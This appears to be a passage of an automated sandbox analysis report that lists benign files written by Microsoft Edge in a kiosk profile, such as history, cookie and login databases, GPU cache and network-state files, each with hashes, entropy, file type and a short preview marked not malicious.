SHA-512:	13009172518387D77A67BBF86719527077BE9534D90CB06E7F34E1CCE7C40B49A185D892EE859A8BAFB69D5EBB6D667831A0FAFBA28AC1F44570C8B68F8C90A4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\ExtensionActivityEdge

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 8, cookie 0x8, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.40981274649195937
Encrypted:	false
SSDEEP:	24:TL1WK3iOvwxwwweePKmJIOAdQBVA/kjo/TJZwJ9OV3WOT/5eQQ:Tmm+/9ZW943WOT/
MD5:	1A7F642FD4F71A656BE75B26B2D9ED79
SHA1:	51BBF587FB0CCC2D726DDB95C96757CC2854CFAD
SHA-256:	B96B6DDC10C29496069E16089DB0AB6911D7C13B82791868D583897C6D317977
SHA-512:	FD14EADCF5F7AB271BE6D8EF682977D1A0B5199A142E4AB353614F2F96AE9B49A6F35A19CC237489F297141994A4A16B580F88FAC44486FCB22C05B2F1C3F7D1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j............M.....8...b..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Favicons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 10, cookie 0x8, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6975083372685086
Encrypted:	false
SSDEEP:	24:LLiZxh0GY/l1rWR1PmCx9fZjsBX+T6UwcE85fBmI:EBmw6fU1zBmI
MD5:	F5BBD8449A9C3AB28AC2DE45E9059B01
SHA1:	C569D730853C33234AF2402E69C19E0C057EC165
SHA-256:	825FF36C4431084C76F3D22CE0C75FA321EA680D1F8548706B43E60FCF5B566E
SHA-512:	96ACDED5A51236630A64FAE91B8FA9FAB43E22E0C1BCB80C2DD8D4829E03FBFA75AA6438053599A42EC4BBCF805BF0B1E6DFF9069B2BA182AD0BB30F2542FD3F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\GPUCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\GPUCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\GPUCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\GPUCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNlf4a:Ls3f4
MD5:	BC397171A076FD219AF8E9502408EC0C
SHA1:	DF41362954CA4F5AB361B76646049533B1F2C958
SHA-256:	C1B46B5532FD0051F35B55D7B1CDF5B0F70E59857FFA3F873AAD109D8B7E6F9E
SHA-512:	7CC518C4281C2326C5B0F9F3BC19ED5C782428DEF37AE8BB68816BD02B472A13BF1A295E15D5452575810F24D1B11CBBECA0EBF410DA8262A388B55C57458E47
Malicious:	false
Preview:	..........................................8.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\History

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.21838546206064954
Encrypted:	false
SSDEEP:	3:K3lDvtFlljq7A/mhWJFuQ3yy7IOWUo1n4dweytllrE9SFcTp4AGbNCV9RUIP:kK75fOOed0Xi99pEYx
MD5:	576D63D9E862F46027BDAFE7BBF6F87D
SHA1:	9994487C691BD69FA7C8245A13B7A55C8289EA71
SHA-256:	44FC30AC1088404DCB0ECD9EBA6CC5668A68D1E5EAF835BB10DD467BE526ADFB
SHA-512:	F88FD2FAA624BC1E0300B6E16EDA97726239498548832179F8BCBBC14E7572E533DF0B1AF60580F3C5CE75E7DB7D4F94C22706BD29EB4AA290E98C0857B411F8
Malicious:	false
Preview:	............[r....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.33890226319329847
Encrypted:	false
SSDEEP:	12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
MD5:	971F4C153D386AC7ED39363C31E854FC
SHA1:	339841CA0088C9EABDE4AACC8567D2289CCB9544
SHA-256:	B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
SHA-512:	1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	379
Entropy (8bit):	5.1896191855469125
Encrypted:	false
SSDEEP:	6:PIWNms1923oH+TcwtRage8Y55HEZzXELIx2KLllIWGAq2P923oH+TcwtRage8Y5i:PI68YebRrcHEZrEkVLnIUv4YebRrcHEz
MD5:	7E04EE53BB905E7A57C7CB58D0BAA034
SHA1:	1493C7CC4C31D1D25913A2E3425C10150C83BFD7
SHA-256:	49341C1227C8AF5979EB94335B022862D539000E256A017E643AA8247AD3F800
SHA-512:	3CAA8F323C37F6588E77921186B94E7F3000A608068213E1789D9771A5003C2EE57D986D54A0B1A22B2651F11C5B117DEBD4AFB0452A3A3D3EA6D0659731B739
Malicious:	false
Preview:	2024/09/01-00:28:14.969 1d10 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2024/09/01-00:28:14.982 1d10 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Storage\leveldb\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Storage\leveldb\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	307
Entropy (8bit):	5.132248340666749
Encrypted:	false
SSDEEP:	6:PItF01923oH+TcwtRa2jM8B2KLllItH2i+q2P923oH+TcwtRa2jMGIFUv:PINYebRjFLnIV2i+v4YebREFUv
MD5:	0FCBAE9B5B5E86C6E7B230B6E6C978F5
SHA1:	A500BE5B68EEDBB76EA4731FC99C5FD948199F87
SHA-256:	B198997AB72C6BAA8A0534197C098D202C6DFD2E90FF9A64A93112A5B0FB7444
SHA-512:	0E26122889416A196C626FC4125E7EBA0C422B4F32F722357B25037BB40935BC20C9CC274A7994A6D24031655578E256C6986F635EC271A8E0160F9F0404685C
Malicious:	false
Preview:	2024/09/01-00:28:13.190 1dec Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Storage\leveldb since it was missing..2024/09/01-00:28:13.209 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Storage\leveldb/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Local Storage\leveldb\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Login Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network Action Predictor

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.40293591932113104
Encrypted:	false
SSDEEP:	24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
MD5:	ADC0CFB8A1A20DE2C4AB738B413CBEA4
SHA1:	238EF489E5FDC6EBB36F09D415FB353350E7097B
SHA-256:	7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
SHA-512:	38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\1f48245d-87a1-491d-ac02-16a278346ca4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\67dfaf9a-7975-46ec-9cf8-8f78ed2f5e70.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\6ee4b0c6-a215-4f17-993c-8e82ad15cd77.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	170
Entropy (8bit):	4.89042451592505
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDHERW6JfYoR6oJbQpwhYMKWKWMS7PMVKJq0nMb1KKqk1Yn:YHpo03h6ubQ+a4MS7PMVKJTnMRKXk1Yn
MD5:	D12E99D60125EDECF0D7D37F9142A486
SHA1:	131115940F711F1AF225BE5CC16E5B78193A4E83
SHA-256:	E36A9921DF8029CE482C15A4022555C85E4F9268DEA6A437A154761A4B13FDD3
SHA-512:	74C13A55117C222D7974FC7F28BDFF0C535719046E91418A149A899BF0D8D5A840EE6765123978D2A6FF08A8F9CAEA12D3DA82F343F29EC1854404E62FF1FB2E
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\8617e6df-5782-4a95-9b0d-50d69fd540f4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	170
Entropy (8bit):	4.89042451592505
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDHERW6JfYoR6oJbQpwhYMKWKWMS7PMVKJq0nMb1KKtiVY:YHpo03h6ubQ+a4MS7PMVKJTnMRK3VY
MD5:	89DA93E9471CD8C8C255E72CA2CF45CB
SHA1:	BEE1905E765B0BB06275A2D6F91598BDA84B3B5A
SHA-256:	79F1C11C178CA0BC1E11CC6569FCFAB5D1B54F0359D878CBD7862F649076EDBA
SHA-512:	09D068514220CDCDF00D73A47E2362B02DF6F227D4666A7E077D8B2B9FC82E29449D2B2ACFC4340C3654C46ECDB9A90373F5B2E2F4F454A1CA334B98CDE74CD9
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\Network Persistent State~RF4b041.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\Network Persistent State~RF60e3b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.7610467771446452
Encrypted:	false
SSDEEP:	48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBkRh:OIEumQv8m1ccnvS6S7
MD5:	B7D69F486EA3F4D53F990CADFFE25832
SHA1:	996F851844E273F0B032A8C254654E1636F5716D
SHA-256:	6C08D6F89F90828E957ACD3F798AA7F4963D10806854E85A759855D2B9E50877
SHA-512:	CAB48212836A1EA43CC0878824FC77712AD26510ECD4F4E36054FF80014BB1E60C38A209DEDDCFD6D0F31C3E465E2363F8C71E6028CF1861CDC8CB7E289C5693
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

